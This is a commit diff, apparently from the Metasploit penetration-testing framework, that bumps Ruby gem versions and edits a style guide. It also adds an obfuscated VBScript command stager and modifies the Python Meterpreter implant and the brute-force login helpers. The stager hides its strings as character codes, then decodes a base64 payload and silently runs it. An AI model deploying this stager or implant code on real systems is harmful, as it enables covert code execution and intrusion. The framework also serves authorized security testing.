Apply Powershell Import comments

Gemfile

@@ -41,7 +41,7 @@ group :development, :test do
 	# 'FactoryGirl.' in factory definitions syntax.
 	gem 'factory_girl', '>= 4.1.0'
 	# running documentation generation tasks and rspec tasks
-	gem 'rake'
+	gem 'rake', '>= 10.0.0'
 end
 
 group :test do
@@ -51,11 +51,10 @@ group :test do
 	gem 'database_cleaner'
 	# testing framework
 	gem 'rspec', '>= 2.12'
-	# add matchers from shoulda, such as query_the_database, which is useful for
-	# testing that the Msf::DBManager activation is respected.
 	gem 'shoulda-matchers'
 	# code coverage for tests
 	# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+	# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
 	gem 'simplecov', '0.5.4', :require => false
 	# Manipulate Time.now in specs
 	gem 'timecop'

Gemfile.lock

@@ -1,62 +1,58 @@
 GEM
   remote: http://rubygems.org/
   specs:
-    activemodel (3.2.13)
-      activesupport (= 3.2.13)
+    activemodel (3.2.14)
+      activesupport (= 3.2.14)
       builder (~> 3.0.0)
-    activerecord (3.2.13)
-      activemodel (= 3.2.13)
-      activesupport (= 3.2.13)
+    activerecord (3.2.14)
+      activemodel (= 3.2.14)
+      activesupport (= 3.2.14)
       arel (~> 3.0.2)
       tzinfo (~> 0.3.29)
-    activesupport (3.2.13)
-      i18n (= 0.6.1)
+    activesupport (3.2.14)
+      i18n (~> 0.6, >= 0.6.4)
       multi_json (~> 1.0)
     arel (3.0.2)
-    bourne (1.4.0)
-      mocha (~> 0.13.2)
     builder (3.0.4)
-    database_cleaner (0.9.1)
-    diff-lcs (1.2.2)
+    database_cleaner (1.1.1)
+    diff-lcs (1.2.4)
     factory_girl (4.2.0)
       activesupport (>= 3.0.0)
-    i18n (0.6.1)
-    json (1.7.7)
-    metaclass (0.0.1)
+    i18n (0.6.5)
+    json (1.8.0)
     metasploit_data_models (0.16.6)
       activerecord (>= 3.2.13)
       activesupport
       pg
-    mocha (0.13.3)
-      metaclass (~> 0.0.1)
-    msgpack (0.5.4)
+    mini_portile (0.5.1)
+    msgpack (0.5.5)
     multi_json (1.0.4)
     network_interface (0.0.1)
-    nokogiri (1.5.9)
+    nokogiri (1.6.0)
+      mini_portile (~> 0.5.0)
     packetfu (1.1.8)
     pcaprub (0.11.3)
-    pg (0.15.1)
-    rake (10.0.4)
-    redcarpet (2.2.2)
+    pg (0.16.0)
+    rake (10.1.0)
+    redcarpet (3.0.0)
     robots (0.10.1)
-    rspec (2.13.0)
-      rspec-core (~> 2.13.0)
-      rspec-expectations (~> 2.13.0)
-      rspec-mocks (~> 2.13.0)
-    rspec-core (2.13.1)
-    rspec-expectations (2.13.0)
+    rspec (2.14.1)
+      rspec-core (~> 2.14.0)
+      rspec-expectations (~> 2.14.0)
+      rspec-mocks (~> 2.14.0)
+    rspec-core (2.14.5)
+    rspec-expectations (2.14.2)
       diff-lcs (>= 1.1.3, < 2.0)
-    rspec-mocks (2.13.0)
-    shoulda-matchers (1.5.2)
+    rspec-mocks (2.14.3)
+    shoulda-matchers (2.3.0)
       activesupport (>= 3.0.0)
-      bourne (~> 1.3)
     simplecov (0.5.4)
       multi_json (~> 1.0.3)
       simplecov-html (~> 0.5.3)
     simplecov-html (0.5.3)
-    timecop (0.6.1)
+    timecop (0.6.3)
     tzinfo (0.3.37)
-    yard (0.8.5.2)
+    yard (0.8.7)
 
 PLATFORMS
   ruby
@@ -74,7 +70,7 @@ DEPENDENCIES
   packetfu (= 1.1.8)
   pcaprub
   pg (>= 0.11)
-  rake
+  rake (>= 10.0.0)
   redcarpet
   robots
   rspec (>= 2.12)

HACKING

@@ -9,8 +9,8 @@ Code Style
 In order to maintain consistency and readability, we ask that you
 adhere to the following style guidelines:
 
- - Hard tabs, not spaces
- - Try to keep your lines under 100 columns (assuming four-space tabs)
+ - Standard Ruby two-space soft tabs, not hard tabs.
+ - Try to keep your lines under 100 columns (assuming two-space tabs)
  - do; end instead of {} for a block
  - Always use str[0,1] instead of str[0]
    (This avoids a known ruby 1.8/1.9 incompatibility.)

data/exploits/cmdstager/vbs_b64_noquot

@@ -0,0 +1,49 @@
+echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
+echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
+echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
+echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
+echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
+echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
+echo tempString  = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
+echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
+echo Set wshShell = CreateObject(scriptShell) >>decode_stub
+echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
+echo Set fs = CreateObject(scriptingFS) >>decode_stub
+echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
+echo data = Replace(data, vbCrLf, nil) >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo emptyString >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub

data/meterpreter/ext_server_stdapi.py

@@ -580,20 +580,28 @@ def stdapi_fs_delete_file(request, response):
 @meterpreter.register_function
 def stdapi_fs_file_expand_path(request, response):
 	path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
-	if path_tlv == '%COMSPEC%':
-		if platform.system() == 'Windows':
-			result = 'cmd.exe'
-		else:
-			result = '/bin/sh'
-	elif path_tlv in ['%TEMP%', '%TMP%'] and platform.system() != 'Windows':
+	if has_windll:
+		path_out = (ctypes.c_char * 4096)()
+		path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
+		result = ''.join(path_out)[:path_out_len]
+	elif path_tlv == '%COMSPEC%':
+		result = '/bin/sh'
+	elif path_tlv in ['%TEMP%', '%TMP%']:
 		result = '/tmp'
 	else:
-		result = os.getenv(path_tlv)
+		result = os.getenv(path_tlv, path_tlv)
 	if not result:
 		return ERROR_FAILURE, response
 	response += tlv_pack(TLV_TYPE_FILE_PATH, result)
 	return ERROR_SUCCESS, response
 
+@meterpreter.register_function
+def stdapi_fs_file_move(request, response):
+	oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
+	newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	os.rename(oldname, newname)
+	return ERROR_SUCCESS, response
+
 @meterpreter.register_function
 def stdapi_fs_getwd(request, response):
 	response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
@@ -622,7 +630,7 @@ def stdapi_fs_md5(request, response):
 		m = hashlib.md5()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
-	response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest())
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
@@ -669,7 +677,7 @@ def stdapi_fs_sha1(request, response):
 		m = hashlib.sha1()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
-	response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest())
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function

data/meterpreter/meterpreter.py

@@ -145,8 +145,9 @@ def run(self):
 			self.data_lock.acquire()
 			self.data += byte
 			self.data_lock.release()
+		data = self.std.read()
 		self.data_lock.acquire()
-		self.data += self.std.read()
+		self.data += data
 		self.data_lock.release()
 
 	def is_read_ready(self):
@@ -208,7 +209,7 @@ def add_process(self, process):
 
 	def run(self):
 		while self.running:
-			if len(select.select([self.socket], [], [], 0)[0]):
+			if len(select.select([self.socket], [], [], 0.5)[0]):
 				request = self.socket.recv(8)
 				if len(request) != 8:
 					break
@@ -391,13 +392,17 @@ def create_response(self, request):
 		reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
 		resp += tlv_pack(reqid_tlv)
 
-		if method_tlv['value'] in self.extension_functions:
-			handler = self.extension_functions[method_tlv['value']]
+		handler_name = method_tlv['value']
+		if handler_name in self.extension_functions:
+			handler = self.extension_functions[handler_name]
 			try:
+				#print("[*] running method {0}".format(handler_name))
 				result, resp = handler(request, resp)
 			except Exception, err:
+				#print("[-] method {0} resulted in an error".format(handler_name))
 				result = ERROR_FAILURE
 		else:
+			#print("[-] method {0} was requested but does not exist".format(handler_name))
 			result = ERROR_FAILURE
 		resp += tlv_pack(TLV_TYPE_RESULT, result)
 		resp = struct.pack('>I', len(resp) + 4) + resp

lib/msf/core/auxiliary/auth_brute.rb

@@ -93,8 +93,6 @@ def each_user_pass(noconn=false,&block)
       next if @@credentials_skipped[fq_user]
       next if @@credentials_tried[fq_user] == p
 
-      datastore['USERNAME'] = u.to_s
-      datastore['PASSWORD'] = p.to_s
       ret = block.call(u, p)
 
       case ret

lib/msf/core/auxiliary/login.rb

@@ -128,10 +128,10 @@ def busy_message?
     false
   end
 
-  def password_prompt?
+  def password_prompt?(username=nil)
     return true if(@recvd =~ @password_regex)
-    if datastore['USERNAME']
-      return true if( !(datastore['USERNAME'].empty?) and @recvd =~ /#{datastore['USERNAME']}'s/)
+    if username
+      return true if( !(username.empty?) and @recvd =~ /#{username}'s/)
     end
     return false
   end